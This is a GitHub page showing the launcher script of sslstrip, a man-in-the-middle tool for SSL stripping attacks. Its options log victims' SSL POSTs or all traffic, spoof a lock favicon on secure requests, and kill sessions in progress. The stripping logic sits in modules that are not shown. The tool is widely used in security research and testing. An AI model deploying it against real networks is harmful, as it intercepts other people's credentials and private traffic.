forked from moxie0/sslstrip
-
Notifications
You must be signed in to change notification settings - Fork 0
/
sslstrip.py
108 lines (84 loc) · 3.97 KB
/
sslstrip.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
#!/usr/bin/env python
"""sslstrip is a MITM tool that implements Moxie Marlinspike's SSL stripping attacks."""
__author__ = "Moxie Marlinspike"
__email__ = "[email protected]"
__license__= """
Copyright (c) 2004-2009 Moxie Marlinspike <[email protected]>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 3 of the
License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
USA
"""
from twisted.web import http
from twisted.internet import reactor
from sslstrip.StrippingProxy import StrippingProxy
from sslstrip.URLMonitor import URLMonitor
from sslstrip.CookieCleaner import CookieCleaner
import sys, getopt, logging, traceback, string, os
gVersion = "0.9"
def usage():
print "\nsslstrip " + gVersion + " by Moxie Marlinspike"
print "Usage: sslstrip <options>\n"
print "Options:"
print "-w <filename>, --write=<filename> Specify file to log to (optional)."
print "-p , --post Log only SSL POSTs. (default)"
print "-s , --ssl Log all SSL traffic to and from server."
print "-a , --all Log all SSL and HTTP traffic to and from server."
print "-l <port>, --listen=<port> Port to listen on (default 10000)."
print "-f , --favicon Substitute a lock favicon on secure requests."
print "-k , --killsessions Kill sessions in progress."
print "-h Print this help message."
print ""
def parseOptions(argv):
logFile = 'sslstrip.log'
logLevel = logging.WARNING
listenPort = 10000
spoofFavicon = False
killSessions = False
try:
opts, args = getopt.getopt(argv, "hw:l:psafk",
["help", "write=", "post", "ssl", "all", "listen=",
"favicon", "killsessions"])
for opt, arg in opts:
if opt in ("-h", "--help"):
usage()
sys.exit()
elif opt in ("-w", "--write"):
logFile = arg
elif opt in ("-p", "--post"):
logLevel = logging.WARNING
elif opt in ("-s", "--ssl"):
logLevel = logging.INFO
elif opt in ("-a", "--all"):
logLevel = logging.DEBUG
elif opt in ("-l", "--listen"):
listenPort = arg
elif opt in ("-f", "--favicon"):
spoofFavicon = True
elif opt in ("-k", "--killsessions"):
killSessions = True
return (logFile, logLevel, listenPort, spoofFavicon, killSessions)
except getopt.GetoptError:
usage()
sys.exit(2)
def main(argv):
(logFile, logLevel, listenPort, spoofFavicon, killSessions) = parseOptions(argv)
logging.basicConfig(level=logLevel, format='%(asctime)s %(message)s',
filename=logFile, filemode='w')
URLMonitor.getInstance().setFaviconSpoofing(spoofFavicon)
CookieCleaner.getInstance().setEnabled(killSessions)
strippingFactory = http.HTTPFactory(timeout=10)
strippingFactory.protocol = StrippingProxy
reactor.listenTCP(int(listenPort), strippingFactory)
print "\nsslstrip " + gVersion + " by Moxie Marlinspike running..."
reactor.run()
if __name__ == '__main__':
main(sys.argv[1:])